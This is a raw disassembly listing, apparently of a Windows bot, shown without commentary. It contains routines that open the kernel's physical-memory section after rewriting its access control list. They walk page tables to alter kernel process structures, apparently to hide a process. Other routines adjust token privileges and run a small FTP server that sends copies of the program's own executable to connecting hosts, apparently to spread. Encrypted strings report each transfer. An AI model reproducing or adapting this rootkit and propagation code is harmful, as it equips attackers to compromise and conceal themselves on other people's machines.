push edi
xor esi, esi
push eax
lea eax, [ebp+var_C]
push esi
push eax
push esi
push esi
push 4
push 6
push [ebp+arg_0]
mov [ebp+var_C], esi
mov [ebp+var_8], esi
call dword_43701C ; GetSecurityInfo
test eax, eax
jnz short loc_40292B
push 20h
lea eax, [ebp+var_2C]
push esi
push eax
call sub_429760
add esp, 0Ch
lea ecx, [ebp+var_4]
xor eax, eax
mov [ebp+var_2C], 2
push ecx
lea ecx, [ebp+var_2C]
push [ebp+var_C]
inc eax
mov [ebp+var_28], eax
mov [ebp+var_24], esi
push ecx
push eax
mov [ebp+var_18], eax
mov [ebp+var_14], eax
mov [ebp+var_10], offset aCurrent_user ; "CURRENT_USER"
mov [ebp+var_4], esi
call dword_437020 ; SetEntriesInAclA
test eax, eax
jnz short loc_402911
push esi
push [ebp+var_4]
push esi
push esi
push 4
push 6
push [ebp+arg_0]
call dword_437024 ; SetSecurityInfo
test eax, eax
jz short loc_40292B
loc_402911: ; CODE XREF: sub_402889+6F�j
cmp [ebp+var_8], esi
mov edi, dword_43703C
jz short loc_402921
push [ebp+var_8]
call edi ; dword_43703C
loc_402921: ; CODE XREF: sub_402889+91�j
cmp [ebp+var_4], esi
jz short loc_40292B
push [ebp+var_4]
call edi ; dword_43703C
loc_40292B: ; CODE XREF: sub_402889+2A�j
; sub_402889+86�j ...
pop edi
pop esi
leave
retn
sub_402889 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40292F proc near ; CODE XREF: sub_402BD7+83�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
push ebp
mov ebp, esp
sub esp, 20h
cmp dword_454044, 5
push edi
jnz short loc_402954
mov eax, dword_454048
xor edi, edi
cmp eax, edi
jz short loc_40295C
cmp eax, 1
jz short loc_40295C
cmp eax, 2
jz short loc_40295C
loc_402954: ; CODE XREF: sub_40292F+E�j
or eax, 0FFFFFFFFh
jmp loc_402A0B
; ---------------------------------------------------------------------------
loc_40295C: ; CODE XREF: sub_40292F+19�j
; sub_40292F+1E�j ...
push esi
lea eax, [ebp+var_8]
push offset off_43AC84
push eax
call dword_454A34 ; RtlInitUnicodeString
lea eax, [ebp+var_8]
mov esi, offset dword_454A44
mov [ebp+var_18], eax
lea eax, [ebp+var_20]
push eax
push 6
push esi
mov [ebp+var_20], 18h
mov [ebp+var_1C], edi
mov [ebp+var_14], edi
mov [ebp+var_10], edi
mov [ebp+var_C], edi
call dword_454A38 ; ZwOpenSection
cmp eax, 0C0000022h
jnz short loc_4029D3
lea eax, [ebp+var_20]
push eax
push 60000h
push esi
call dword_454A38 ; ZwOpenSection
push dword_454A44
call sub_402889
pop ecx
push dword_454A44
call dword_437044 ; CloseHandle
lea eax, [ebp+var_20]
push eax
push 6
push esi
call dword_454A38 ; ZwOpenSection
loc_4029D3: ; CODE XREF: sub_40292F+6D�j
cmp eax, edi
pop esi
jge short loc_4029DD
push 0FFFFFFFEh
pop eax
jmp short loc_402A0B
; ---------------------------------------------------------------------------
loc_4029DD: ; CODE XREF: sub_40292F+A7�j
push 1000h
push 39000h
push edi
push 6
push dword_454A44
call dword_437040 ; MapViewOfFile
xor ecx, ecx
cmp eax, edi
setnz cl
mov dword_454A40, eax
lea ecx, ds:0FFFFFFFDh[ecx*4]
mov eax, ecx
loc_402A0B: ; CODE XREF: sub_40292F+28�j
; sub_40292F+AC�j
pop edi
leave
retn
sub_40292F endp
; =============== S U B R O U T I N E =======================================
sub_402A0E proc near ; CODE XREF: sub_402BD7+E8�p
; sub_402BD7:loc_402CD8�p
mov eax, dword_454A40
test eax, eax
jz short loc_402A1E
push eax
call dword_437048 ; UnmapViewOfFile
loc_402A1E: ; CODE XREF: sub_402A0E+7�j
mov eax, dword_454A44
test eax, eax
jz short loc_402A2E
push eax
call dword_437044 ; CloseHandle
loc_402A2E: ; CODE XREF: sub_402A0E+17�j
and dword_454A40, 0
and dword_454A44, 0
retn
sub_402A0E endp
; =============== S U B R O U T I N E =======================================
sub_402A3D proc near ; CODE XREF: sub_402AB5+B�p
; sub_402B06+B�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
push esi
test eax, eax
push edi
jz short loc_402AB0
mov edi, [esp+8+arg_4]
mov ecx, edi
shr ecx, 16h
mov eax, [eax+ecx*4]
test al, 1
jz short loc_402AB0
test al, al
jns short loc_402A69
mov esi, eax
xor esi, edi
and esi, 3FFFFFh
xor esi, eax
jmp short loc_402AAC
; ---------------------------------------------------------------------------
loc_402A69: ; CODE XREF: sub_402A3D+1C�j
and ax, 0F000h
push 1000h
push eax
push 0
push 0F001Fh
push dword_454A44
call dword_437040 ; MapViewOfFile
mov ecx, edi
shr ecx, 0Ch
and ecx, 3FFh
mov ecx, [eax+ecx*4]
test cl, 1
jz short loc_402AB0
mov esi, ecx
push eax
xor esi, edi
and esi, 0FFFh
xor esi, ecx
call dword_437048 ; UnmapViewOfFile
loc_402AAC: ; CODE XREF: sub_402A3D+2A�j
mov eax, esi
jmp short loc_402AB2
; ---------------------------------------------------------------------------
loc_402AB0: ; CODE XREF: sub_402A3D+8�j
; sub_402A3D+18�j ...
xor eax, eax
loc_402AB2: ; CODE XREF: sub_402A3D+71�j
pop edi
pop esi
retn
sub_402A3D endp
; =============== S U B R O U T I N E =======================================
sub_402AB5 proc near ; CODE XREF: sub_402BD7+92�p
; sub_402BD7+A0�p ...
arg_0 = dword ptr 4
push esi
push [esp+4+arg_0]
push dword_454A40
call sub_402A3D
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz short loc_402AEB
and ax, 0F000h
push 1000h
push eax
push 0
push 4
push dword_454A44
call dword_437040 ; MapViewOfFile
test eax, eax
jnz short loc_402AEF
loc_402AEB: ; CODE XREF: sub_402AB5+16�j
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_402AEF: ; CODE XREF: sub_402AB5+34�j
shr esi, 2
and esi, 3FFh
push eax
mov esi, [eax+esi*4]
call dword_437048 ; UnmapViewOfFile
mov eax, esi
pop esi
retn
sub_402AB5 endp
; =============== S U B R O U T I N E =======================================
sub_402B06 proc near ; CODE XREF: sub_402BD7+D0�p
; sub_402BD7+DD�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_0]
push dword_454A40
call sub_402A3D
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz short loc_402B3C
and ax, 0F000h
push 1000h
push eax
push 0
push 2
push dword_454A44
call dword_437040 ; MapViewOfFile
test eax, eax
jnz short loc_402B40
loc_402B3C: ; CODE XREF: sub_402B06+16�j
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_402B40: ; CODE XREF: sub_402B06+34�j
mov ecx, [esp+4+arg_4]
push eax
shr esi, 2
and esi, 3FFh
mov [eax+esi*4], ecx
call dword_437048 ; UnmapViewOfFile
xor eax, eax
pop esi
inc eax
retn
sub_402B06 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402B5C proc near ; CODE XREF: sub_402BD7+6F�p
; sub_402BD7+F5�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 20h
lea eax, [ebp+var_4]
push eax
push 28h
call dword_43704C ; GetCurrentProcess
push eax
call dword_437010 ; OpenProcessToken
test eax, eax
jnz short loc_402B7B
leave
retn
; ---------------------------------------------------------------------------
loc_402B7B: ; CODE XREF: sub_402B5C+1B�j
lea eax, [ebp+var_10]
push esi
push eax
xor esi, esi
push [ebp+arg_0]
push esi
call dword_437014 ; LookupPrivilegeValueA
test eax, eax
jz short loc_402BC9
mov eax, [ebp+var_10]
mov [ebp+var_20], 1
mov [ebp+var_1C], eax
mov eax, [ebp+var_C]
mov [ebp+var_18], eax
xor eax, eax
cmp [ebp+arg_4], esi
setz al
lea eax, [eax+eax+2]
mov [ebp+var_14], eax
lea eax, [ebp+var_8]
push eax
push esi
lea eax, [ebp+var_20]
push 10h
push eax
push esi
push [ebp+var_4]
call dword_437018 ; AdjustTokenPrivileges
mov esi, eax
loc_402BC9: ; CODE XREF: sub_402B5C+32�j
push [ebp+var_4]
call dword_437044 ; CloseHandle
mov eax, esi
pop esi
leave
retn
sub_402B5C endp
; =============== S U B R O U T I N E =======================================
sub_402BD7 proc near ; CODE XREF: sub_418FA1+22F�p
push ebx
push ebp
push esi
push edi
push offset dword_454040
mov dword_454040, 94h
call dword_437050 ; GetVersionExA
test eax, eax
jz loc_402CE2
cmp dword_454044, 5
jnz loc_402CE2
mov eax, dword_454048
test eax, eax
jnz short loc_402C1A
mov edi, 0A0h
mov ebx, 0A4h
jmp short loc_402C3E
; ---------------------------------------------------------------------------
loc_402C1A: ; CODE XREF: sub_402BD7+35�j
cmp eax, 1
jnz short loc_402C2B
mov edi, 88h
mov ebx, 8Ch
jmp short loc_402C3E
; ---------------------------------------------------------------------------
loc_402C2B: ; CODE XREF: sub_402BD7+46�j
cmp eax, 2
jnz loc_402CE2
mov edi, 8Ah
mov ebx, 8Eh
loc_402C3E: ; CODE XREF: sub_402BD7+41�j
; sub_402BD7+52�j
mov ebp, offset aSesecuritypriv ; "SeSecurityPrivilege"
push 1
push ebp
call sub_402B5C
pop ecx
pop ecx
call sub_402822
test eax, eax
jz loc_402CE2
call sub_40292F
cmp eax, 1
jnz short loc_402CDD
push 0FFDFF124h
call sub_402AB5
test eax, eax
pop ecx
jz short loc_402CD8
add eax, 44h
push eax
call sub_402AB5
mov esi, eax
pop ecx
test esi, esi
jz short loc_402CD8
lea eax, [esi+edi]
push eax
call sub_402AB5
add esi, ebx
mov edi, eax
push esi
call sub_402AB5
pop ecx
mov esi, eax
test edi, edi
pop ecx
jz short loc_402CD8
test esi, esi
jz short loc_402CD8
lea eax, [edi+4]
push esi
push eax
call sub_402B06
pop ecx
test eax, eax
pop ecx
jz short loc_402CD8
push edi
push esi
call sub_402B06
pop ecx
test eax, eax
pop ecx
jz short loc_402CD8
call sub_402A0E
call sub_402871
push 0
push ebp
call sub_402B5C
pop ecx
xor eax, eax
pop ecx
inc eax
jmp short loc_402CE4
; ---------------------------------------------------------------------------
loc_402CD8: ; CODE XREF: sub_402BD7+9A�j
; sub_402BD7+AA�j ...
call sub_402A0E
loc_402CDD: ; CODE XREF: sub_402BD7+8B�j
call sub_402871
loc_402CE2: ; CODE XREF: sub_402BD7+1B�j
; sub_402BD7+28�j ...
xor eax, eax
loc_402CE4: ; CODE XREF: sub_402BD7+FF�j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_402BD7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402CE9 proc near ; DATA XREF: sub_4020BA+F1�o
; sub_406C69+DD�o ...
var_2E08 = byte ptr -2E08h
var_6F8 = byte ptr -6F8h
var_694 = byte ptr -694h
var_480 = dword ptr -480h
var_47C = byte ptr -47Ch
var_3FC = dword ptr -3FCh
var_3EC = dword ptr -3ECh
var_3E8 = dword ptr -3E8h
var_2E4 = byte ptr -2E4h
var_2B0 = byte ptr -2B0h
var_24C = dword ptr -24Ch
var_248 = dword ptr -248h
var_244 = dword ptr -244h
var_148 = byte ptr -148h
var_138 = byte ptr -138h
var_D4 = byte ptr -0D4h
var_A0 = word ptr -0A0h
var_9E = word ptr -9Eh
var_9C = dword ptr -9Ch
var_90 = byte ptr -90h
var_80 = dword ptr -80h
var_7C = byte ptr -7Ch
var_74 = byte ptr -74h
var_70 = byte ptr -70h
var_68 = byte ptr -68h
var_64 = byte ptr -64h
var_5C = dword ptr -5Ch
var_58 = byte ptr -58h
var_50 = byte ptr -50h
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = byte ptr -40h
var_3C = byte ptr -3Ch
var_34 = byte ptr -34h
var_30 = byte ptr -30h
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_10 = byte ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 2E08h
call sub_429B60
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov ecx, 0ABh
mov esi, eax
lea edi, [ebp+var_694]
xor ebx, ebx
rep movsd
xor esi, esi
push ebx
inc esi
push ebx
mov [eax+2A4h], esi
mov eax, [ebp+var_3EC]
push ebx
mov [ebp+var_8], eax
mov eax, [ebp+var_480]
push offset sub_41EB9C
push ebx
push ebx
mov [ebp+var_44], esi
mov [ebp+var_1C], esi
mov [ebp+var_24C], ebx
mov [ebp+var_3E8], ebx
mov dword_454A30, eax
call dword_437180 ; CreateThread
push ebx
push esi
push 2
call dword_456FD0 ; socket
lea ecx, [ebp+var_44]
push 4
push ecx
push 4
push 0FFFFh
push eax
mov dword_454A1C, eax
call dword_456F10 ; setsockopt
lea eax, [ebp+var_1C]
push eax
push 8004667Eh
push dword_454A1C
call dword_456FF4 ; ioctlsocket
mov ax, word ptr dword_454A30
mov [ebp+var_A0], 2
push eax
mov [ebp+var_9C], ebx
call dword_456F38 ; ntohs
mov [ebp+var_9E], ax
lea eax, [ebp+var_A0]
push 10h
push eax
push dword_454A1C
call dword_456F6C ; bind
test eax, eax
jge short loc_402DC7
mov eax, esi
jmp loc_40326F
; ---------------------------------------------------------------------------
loc_402DC7: ; CODE XREF: sub_402CE9+D5�j
push 0Ah
push dword_454A1C
call dword_456F68 ; listen
mov eax, dword_454A1C
mov [ebp+var_24C], esi
mov [ebp+var_248], eax
mov [ebp+var_4], eax
loc_402DE9: ; CODE XREF: sub_402CE9+137�j
; sub_402CE9+57E�j
push 41h
lea eax, [ebp+var_3E8]
pop ecx
lea esi, [ebp+var_24C]
push ebx
push ebx
push ebx
push eax
mov eax, [ebp+var_4]
lea edi, [ebp+var_3E8]
inc eax
rep movsd
push eax
call dword_456F1C ; select
cmp eax, 0FFFFFFFFh
jz loc_40326C
xor esi, esi
cmp [ebp+var_4], ebx
mov [ebp+arg_0], esi
jl short loc_402DE9
loc_402E22: ; CODE XREF: sub_402CE9+578�j
push 64h
lea eax, [ebp+var_2B0]
push ebx
push eax
call sub_429760
push 64h
lea eax, [ebp+var_138]
push ebx
push eax
call sub_429760
add esp, 18h
lea eax, [ebp+var_3E8]
push eax
push esi
call dword_456DD8 ; __WSAFDIsSet
test eax, eax
jz loc_40325A
mov eax, dword_454A1C
cmp esi, eax
jnz loc_402EEC
lea ecx, [ebp+var_5C]
mov [ebp+var_5C], 10h
push ecx
lea ecx, [ebp+var_148]
push ecx
push eax
call dword_456FE4 ; accept
cmp eax, 0FFFFFFFFh
mov [ebp+var_28], eax
jz loc_40325A
mov edx, [ebp+var_24C]
xor ecx, ecx
cmp edx, ebx
jbe short loc_402EA5
loc_402E97: ; CODE XREF: sub_402CE9+1BA�j
cmp [ebp+ecx*4+var_248], eax
jz short loc_402EA5
inc ecx
cmp ecx, edx
jb short loc_402E97
loc_402EA5: ; CODE XREF: sub_402CE9+1AC�j
; sub_402CE9+1B5�j
cmp ecx, edx
jnz short loc_402EBB
cmp edx, 40h
jnb short loc_402EBB
mov [ebp+ecx*4+var_248], eax
inc [ebp+var_24C]
loc_402EBB: ; CODE XREF: sub_402CE9+1BE�j
; sub_402CE9+1C3�j
cmp eax, [ebp+var_4]
jle short loc_402EC3
mov [ebp+var_4], eax
loc_402EC3: ; CODE XREF: sub_402CE9+1D5�j
mov esi, offset a220 ; "220\r\n"
lea edi, [ebp+var_7C]
movsd
lea eax, [ebp+var_7C]
push ebx
push eax
movsw
call sub_4293A0
pop ecx
push eax
lea eax, [ebp+var_7C]
push eax
push [ebp+var_28]
call dword_456F8C ; send
jmp loc_403257
; ---------------------------------------------------------------------------
loc_402EEC: ; CODE XREF: sub_402CE9+177�j
push ebx
lea eax, [ebp+var_2B0]
push 64h
push eax
push esi
call dword_456F58 ; recv
test eax, eax
jg short loc_402F49
mov ecx, [ebp+var_24C]
xor eax, eax
cmp ecx, ebx
jbe short loc_402F3D
loc_402F0D: ; CODE XREF: sub_402CE9+230�j
cmp [ebp+eax*4+var_248], esi
jz short loc_402F32
inc eax
cmp eax, ecx
jb short loc_402F0D
jmp short loc_402F3D
; ---------------------------------------------------------------------------
loc_402F1D: ; CODE XREF: sub_402CE9+24C�j
mov ecx, [ebp+eax*4+var_244]
mov [ebp+eax*4+var_248], ecx
mov ecx, [ebp+var_24C]
inc eax
loc_402F32: ; CODE XREF: sub_402CE9+22B�j
dec ecx
cmp eax, ecx
jb short loc_402F1D
dec [ebp+var_24C]
loc_402F3D: ; CODE XREF: sub_402CE9+222�j
; sub_402CE9+232�j
push esi
call dword_456FF0 ; closesocket
jmp loc_40325A
; ---------------------------------------------------------------------------
loc_402F49: ; CODE XREF: sub_402CE9+216�j
lea eax, [ebp+var_6F8]
push eax
lea eax, [ebp+var_138]
push eax
lea eax, [ebp+var_2B0]
push offset aSS_1 ; "%s %s"
push eax
call sub_429E0E
mov esi, dword_437178
add esp, 10h
lea eax, [ebp+var_138]
push offset aUser ; "USER"
push eax
call esi ; dword_437178
test eax, eax
jnz short loc_402FA2
mov esi, offset a331 ; "331\r\n"
lea edi, [ebp+var_58]
movsd
lea eax, [ebp+var_58]
push ebx
push eax
movsw
call sub_4293A0
pop ecx
push eax
lea eax, [ebp+var_58]
jmp loc_40323B
; ---------------------------------------------------------------------------
loc_402FA2: ; CODE XREF: sub_402CE9+298�j
lea eax, [ebp+var_138]
push offset aPass ; "PASS"
push eax
call esi ; dword_437178
test eax, eax
jnz short loc_402FD3
mov esi, offset a230 ; "230\r\n"
lea edi, [ebp+var_70]
movsd
lea eax, [ebp+var_70]
push ebx
push eax
movsw
call sub_4293A0
pop ecx
push eax
lea eax, [ebp+var_70]
jmp loc_40323B
; ---------------------------------------------------------------------------
loc_402FD3: ; CODE XREF: sub_402CE9+2C9�j
lea eax, [ebp+var_138]
push offset aPort ; "PORT"
push eax
call esi ; dword_437178
test eax, eax
jnz loc_4030AE
lea eax, [ebp+var_2E4]
push eax
lea eax, [ebp+var_D4]
push eax
lea eax, [ebp+var_68]
push eax
lea eax, [ebp+var_34]
push eax
lea eax, [ebp+var_74]
push eax
lea eax, [ebp+var_40]
push eax
lea eax, [ebp+var_2B0]
push offset aS ; "%*s %[^,],%[^,],%[^,],%[^,],%[^,],%[^\n]"...
push eax
call sub_429E0E
lea eax, [ebp+var_D4]
push eax
call sub_42A100
mov esi, eax
lea eax, [ebp+var_2E4]
push eax
call sub_42A100
mov edi, eax
push 32h
lea eax, [ebp+var_D4]
push ebx
push eax
call sub_429760
push edi
push esi
lea eax, [ebp+var_D4]
push offset aXX ; "%x%x\n"
push eax
call sub_429B03
add esp, 44h
lea eax, [ebp+var_D4]
push 10h
push ebx
push eax
call sub_42A05E
mov [ebp+var_80], eax
lea eax, [ebp+var_68]
push eax
lea eax, [ebp+var_34]
push eax
lea eax, [ebp+var_74]
push eax
lea eax, [ebp+var_40]
push eax
lea eax, [ebp+var_90]
push offset dword_43AB7C
push eax
call sub_429B03
mov esi, offset a200 ; "200\r\n"
lea edi, [ebp+var_64]
add esp, 24h
lea eax, [ebp+var_64]
movsd
push ebx
push eax
movsw
call sub_4293A0
pop ecx
push eax
lea eax, [ebp+var_64]
jmp loc_40323B
; ---------------------------------------------------------------------------
loc_4030AE: ; CODE XREF: sub_402CE9+2FA�j
lea eax, [ebp+var_138]
push offset aRetr ; "RETR"
push eax
call esi ; dword_437178
test eax, eax
jnz loc_4031F4
mov esi, offset a150 ; "150\r\n"
lea edi, [ebp+var_10]
movsd
lea eax, [ebp+var_10]
push ebx
push eax
movsw
call sub_4293A0
pop ecx
push eax
lea eax, [ebp+var_10]
push eax
push [ebp+arg_0]
call dword_456F8C ; send
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_47C]
push [ebp+var_3FC]
push eax
lea eax, [ebp+var_2E08]
push [ebp+var_3EC]
push eax
lea eax, [ebp+var_90]
push [ebp+var_80]
push eax
call sub_403276
add esp, 1Ch
test eax, eax
jz loc_4031D8
push [ebp+var_48]
call sub_4032D2
pop ecx
mov esi, offset a226 ; "226\r\n"
test eax, eax
push ebx
jle loc_4031C2
lea edi, [ebp+var_50]
lea eax, [ebp+var_50]
movsd
push eax
movsw
call sub_4293A0
pop ecx
push eax
lea eax, [ebp+var_50]
push eax
push [ebp+arg_0]
call dword_456F8C ; send
inc dword_457D08
cmp dword_454A4C, ebx
jz short loc_40318E
cmp dword_454A50, ebx
jnz short loc_40319A
lea eax, [ebp+var_90]
push eax
push offset aJt17j1imtvd1 ; "jt17J1ImTVD1"
lea eax, [ebp+var_47C]
push offset aSS_2 ; "%s -> %s"
push eax
push [ebp+var_8]
call sub_41CE4A
add esp, 14h
loc_40318E: ; CODE XREF: sub_402CE9+478�j
cmp dword_454A50, ebx
jz loc_403245
loc_40319A: ; CODE XREF: sub_402CE9+480�j
lea eax, [ebp+var_90]
push eax
push offset aJt17j1imtvd1 ; "jt17J1ImTVD1"
lea eax, [ebp+var_47C]
push offset aSS_2 ; "%s -> %s"
push eax
push [ebp+var_8]
call sub_41CDD4
add esp, 14h
jmp loc_403245
; ---------------------------------------------------------------------------
loc_4031C2: ; CODE XREF: sub_402CE9+448�j
lea edi, [ebp+var_18]
lea eax, [ebp+var_18]
movsd
push eax
movsw
call sub_4293A0
pop ecx
push eax
lea eax, [ebp+var_18]
jmp short loc_40323B
; ---------------------------------------------------------------------------
loc_4031D8: ; CODE XREF: sub_402CE9+431�j
mov esi, offset a425 ; "425\r\n"
lea edi, [ebp+var_24]
movsd
lea eax, [ebp+var_24]
push ebx
push eax
movsw
call sub_4293A0
pop ecx
push eax
lea eax, [ebp+var_24]
jmp short loc_40323B
; ---------------------------------------------------------------------------
loc_4031F4: ; CODE XREF: sub_402CE9+3D5�j
lea eax, [ebp+var_138]
push offset aQuit ; "QUIT"
push eax
call esi ; dword_437178
test eax, eax
push ebx
jnz short loc_403222
mov esi, offset a221 ; "221\r\n"
lea edi, [ebp+var_30]
movsd
lea eax, [ebp+var_30]
push eax
movsw
call sub_4293A0
pop ecx
push eax
lea eax, [ebp+var_30]
jmp short loc_40323B
; ---------------------------------------------------------------------------
loc_403222: ; CODE XREF: sub_402CE9+51C�j
mov esi, offset a503 ; "503\r\n"
lea edi, [ebp+var_3C]
movsd
lea eax, [ebp+var_3C]
push eax
movsw
call sub_4293A0
pop ecx
push eax
lea eax, [ebp+var_3C]
loc_40323B: ; CODE XREF: sub_402CE9+2B4�j
; sub_402CE9+2E5�j ...
push eax
push [ebp+arg_0]
call dword_456F8C ; send
loc_403245: ; CODE XREF: sub_402CE9+4AB�j
; sub_402CE9+4D4�j
push 64h
lea eax, [ebp+var_2B0]
push ebx
push eax
call sub_429760
add esp, 0Ch
loc_403257: ; CODE XREF: sub_402CE9+1FE�j
mov esi, [ebp+arg_0]
loc_40325A: ; CODE XREF: sub_402CE9+16A�j
; sub_402CE9+19C�j ...
inc esi
cmp esi, [ebp+var_4]
mov [ebp+arg_0], esi
jle loc_402E22
jmp loc_402DE9
; ---------------------------------------------------------------------------
loc_40326C: ; CODE XREF: sub_402CE9+129�j
xor eax, eax
inc eax
loc_40326F: ; CODE XREF: sub_402CE9+D9�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_402CE9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403276 proc near ; CODE XREF: sub_402CE9+427�p
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 10h
push esi
push 0
push 1
push 2
call dword_456FD0 ; socket
mov esi, [ebp+arg_18]
push [ebp+arg_0]
mov [ebp+var_10], 2
mov [esi], eax
call dword_456F7C ; inet_addr
push [ebp+arg_4]
mov [ebp+var_C], eax
call dword_456F38 ; ntohs
mov [ebp+var_E], ax
lea eax, [ebp+var_10]
push 10h
push eax
push dword ptr [esi]
call dword_456EBC ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_4032CC
push dword ptr [esi]
call dword_456FF0 ; closesocket
xor eax, eax
jmp short loc_4032CF
; ---------------------------------------------------------------------------
loc_4032CC: ; CODE XREF: sub_403276+48�j
xor eax, eax
inc eax
loc_4032CF: ; CODE XREF: sub_403276+54�j
pop esi
leave
retn
sub_403276 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4032D2 proc near ; CODE XREF: sub_402CE9+43A�p
var_1108 = byte ptr -1108h
var_108 = byte ptr -108h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1108h
call sub_429B60
push ebx
push esi
push edi
lea eax, [ebp+var_108]
push 104h
xor edi, edi
push eax
push edi
call dword_43717C ; GetModuleFileNameA
lea eax, [ebp+var_108]
push offset aRb ; "rb"
push eax
call sub_42A50C
mov esi, eax
pop ecx
xor ebx, ebx
cmp esi, edi
pop ecx
mov [ebp+var_4], edi
jz short loc_403381
push 2
push edi
push esi
call sub_42A422
push esi
call sub_42A29F
push edi
push edi
push esi
mov [ebp+var_4], eax
call sub_42A422
add esp, 1Ch
jmp short loc_40337B
; ---------------------------------------------------------------------------
loc_403334: ; CODE XREF: sub_4032D2+AD�j
push 1000h
lea eax, [ebp+var_1108]
push edi
push eax
call sub_429760
push esi
push 800h
lea eax, [ebp+var_1108]
push 1
push eax
call sub_42A188
add esp, 1Ch
test byte ptr [esi+0Ch], 20h
jnz short loc_403381
cmp eax, edi
jle short loc_40337B
push edi
push eax
lea eax, [ebp+var_1108]
push eax
push [ebp+arg_0]
call dword_456F8C ; send
add ebx, eax
loc_40337B: ; CODE XREF: sub_4032D2+60�j
; sub_4032D2+93�j
test byte ptr [esi+0Ch], 10h
jz short loc_403334
loc_403381: ; CODE XREF: sub_4032D2+41�j
; sub_4032D2+8F�j
push esi
call sub_42A10B
pop ecx
push [ebp+arg_0]
call dword_456FF0 ; closesocket
mov eax, [ebp+var_4]
pop edi
sub eax, ebx
pop esi
neg eax
sbb eax, eax
not eax
and eax, ebx
pop ebx
leave
retn
sub_4032D2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4033A3 proc near ; CODE XREF: sub_40A9FE+153�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
push esi
push edi
push 0Ch
xor edi, edi
xor ebx, ebx
call sub_42381F
cmp eax, edi
pop ecx
jle loc_40345D
mov esi, eax
imul esi, 2724h
cmp dword_46D72C[esi], edi
jz short loc_4033CE
inc ebx
loc_4033CE: ; CODE XREF: sub_4033A3+28�j
push dword_454A1C
and byte ptr dword_46B010[esi], 0
mov dword_46D72C[esi], edi
mov dword_46D720[esi], edi
mov dword_46D724[esi], edi
mov dword_46D728[esi], edi
call dword_456FF0 ; closesocket
push edi
push dword_46D72C[esi]
call dword_437054 ; TerminateThread
cmp ebx, edi
jz short loc_40345D
cmp [ebp+arg_8], 0
mov ebx, offset aBnjcz_zig1m0 ; "bNJcZ.ziG1m0"
mov esi, offset aJt17j1imtvd1 ; "jt17J1ImTVD1"
mov edi, offset aSSDS ; "%s %s %d %s"
jnz short loc_40343D
cmp [ebp+arg_C], 0
jnz short loc_403443
push offset aTfee90w_vdg1u8 ; "TFEE90W.vdG1u8Ajp1eidrT.d2k2X/no6gm/"
push 1
push ebx
push esi
push edi
push [ebp+arg_0]
push [ebp+arg_4]
call sub_41CE4A
add esp, 1Ch
loc_40343D: ; CODE XREF: sub_4033A3+7A�j
cmp [ebp+arg_C], 0
jz short loc_4034A0
loc_403443: ; CODE XREF: sub_4033A3+80�j
push offset aTfee90w_vdg1u8 ; "TFEE90W.vdG1u8Ajp1eidrT.d2k2X/no6gm/"
push 1
push ebx
push esi
push edi
push [ebp+arg_0]
push [ebp+arg_4]
call sub_41CDD4
add esp, 1Ch
jmp short loc_4034A0
; ---------------------------------------------------------------------------
loc_40345D: ; CODE XREF: sub_4033A3+14�j
; sub_4033A3+65�j
cmp [ebp+arg_8], 0
mov esi, offset aJt17j1imtvd1 ; "jt17J1ImTVD1"
mov ebx, offset aIbtox1Hofe0hcx ; "IBtOx1/HOfe0Hcxmb/oUlVg00eWuQ.F61Hj/"
mov edi, offset aSS_1 ; "%s %s"
jnz short loc_403489
cmp [ebp+arg_C], 0
jnz short loc_40348F
push ebx
push esi
push edi
push [ebp+arg_0]
push [ebp+arg_4]
call sub_41CE4A
add esp, 14h
loc_403489: ; CODE XREF: sub_4033A3+CD�j
cmp [ebp+arg_C], 0
jz short loc_4034A0
loc_40348F: ; CODE XREF: sub_4033A3+D3�j
push ebx
push esi
push edi
push [ebp+arg_0]
push [ebp+arg_4]
call sub_41CDD4
add esp, 14h
loc_4034A0: ; CODE XREF: sub_4033A3+9E�j
; sub_4033A3+B8�j ...
pop edi
pop esi
pop ebx
pop ebp
retn
sub_4033A3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4034A5 proc near ; CODE XREF: sub_407F55+3A�p
var_F4 = byte ptr -0F4h
var_F0 = byte ptr -0F0h
var_90 = byte ptr -90h
var_74 = byte ptr -74h
var_3C = byte ptr -3Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
